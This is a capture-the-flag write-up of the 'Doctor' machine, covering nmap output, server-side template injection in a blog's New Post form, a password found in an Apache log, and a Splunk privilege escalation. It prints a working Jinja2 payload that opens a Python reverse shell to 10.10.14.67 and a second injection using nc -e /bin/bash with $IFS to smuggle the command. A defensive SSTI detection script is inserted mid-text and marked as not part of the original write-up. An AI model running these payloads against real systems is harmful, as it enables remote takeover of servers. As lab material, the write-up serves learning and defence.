Author Ikonw

Nmap

# Nmap 7.80 scan initiated Sun Sep 27 09:39:47 2020 as: nmap -Pn -sCV -p22,80,8089 -oN nmap/Full_10.129.11.0.nmap 10.129.11.0
Nmap scan report for doctor.htb (10.129.11.0)
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Starting enumeration on port 80, we found the info@doctors.htb email address.

Let’s add the hostname doctors.htb to /etc/hosts

After adding it to the hosts file, visiting doctors.htb brings us to a login page.

We tried to log in as info@doctors.htb; using the reset password function, we can verify that info@doctors.htb is not a valid account.

Once we register, there’s only one function.

From the page source, we found /archive, but it appears to be a blank page.

The New Post function is vulnerable to server-side template injection (SSTI).

Server Side Template Injection Payloads

When we input {{7*7}}, we notice that it is evaluated and shown on the /archive page.

This confirms that the application is using either Twig or Jinja2.

Next, craft a malicious payload to obtain a reverse connection:

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.67\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read()}}{%endif%}{%endfor%}

Another way would be using a malicious curl command; this seems to be the unintended way:

<img src=http://10.10.14.67:1337/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.67'$IFS'4444')>
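As an added example (not part of the original writeup), the probe and object-traversal patterns seen above can be turned into a detection check on the defender's side: it URL-decodes a request field, flags template delimiters, and rates a {{7*7}}-style arithmetic probe lower than a fragment that walks Python internals. The pattern names, the sample Apache access-log lines and the /search endpoint in them are constructed for illustration.

```python
"""Detect SSTI probes in captured request data (added example, not from the writeup)."""
import re
from urllib.parse import unquote_plus

# Delimiters of common engines; Jinja2 and Twig both use {{ }} and {% %}.
TEMPLATE_PATTERNS = {
    "jinja2/twig expression": re.compile(r"\{\{.*?\}\}", re.S),
    "jinja2/twig statement": re.compile(r"\{%.*?%\}", re.S),
    "freemarker/spring expression": re.compile(r"\$\{.*?\}", re.S),
    "erb/jsp expression": re.compile(r"<%.*?%>", re.S),
}
# Arithmetic probe like 7*7 or 7*'7': the first thing a tester submits.
ARITH_PROBE = re.compile(r"\d+\s*\*\s*'?\d+'?")
# Python introspection names that only appear in object-traversal payloads.
DUNDER = re.compile(r"__(class|base|mro|subclasses|globals|builtins|import)__")

def find_ssti_indicators(field):
    """Return one finding per template-delimited fragment in a request field."""
    decoded = unquote_plus(field)
    findings = []
    for engine, pattern in TEMPLATE_PATTERNS.items():
        for m in pattern.finditer(decoded):
            frag = m.group(0)
            severity = "probe" if ARITH_PROBE.search(frag) else "suspicious"
            if DUNDER.search(frag):
                severity = "exploit"  # object traversal, not a harmless probe
            findings.append({"engine": engine, "fragment": frag, "severity": severity})
    return findings

# Apache combined-format prefix: client, timestamp, request line, status.
APACHE_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

def scan_access_log(lines):
    """Return (client, path, findings) for each request whose URL carries SSTI indicators."""
    hits = []
    for line in lines:
        m = APACHE_LINE.match(line)
        if m and (findings := find_ssti_indicators(m.group("path"))):
            hits.append((m.group("ip"), m.group("path"), findings))
    return hits

# Constructed sample lines (not real traffic); the client address mirrors the writeup's.
SAMPLE_LOG = [
    '10.10.14.67 - - [27/Sep/2020:09:41:02 +0000] "GET /archive HTTP/1.1" 200 512',
    '10.10.14.67 - - [27/Sep/2020:09:42:10 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 640',
    '10.10.14.67 - - [27/Sep/2020:09:45:31 +0000] "GET /search?q=%7B%25+for+x+in+().__class__.__base__.__subclasses__()+%25%7D HTTP/1.1" 200 700',
]
```

The injection on this box went through a POST form, which the access log does not record, so run find_ssti_indicators over the POST body captured by a WAF or application log for that case.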

www-data to user

Going to the /home directory, we found the user shaun.

We found the user's password in /var/log/apache/backup.

And we can switch to user shaun.

Using a privilege escalation suggester, we found that Splunk is vulnerable.

Using https://github.com/cnotin/SplunkWhisperer2, we are able to escalate privileges to root.

The initial foothold is more annoying; going from www-data to user to root is easy.
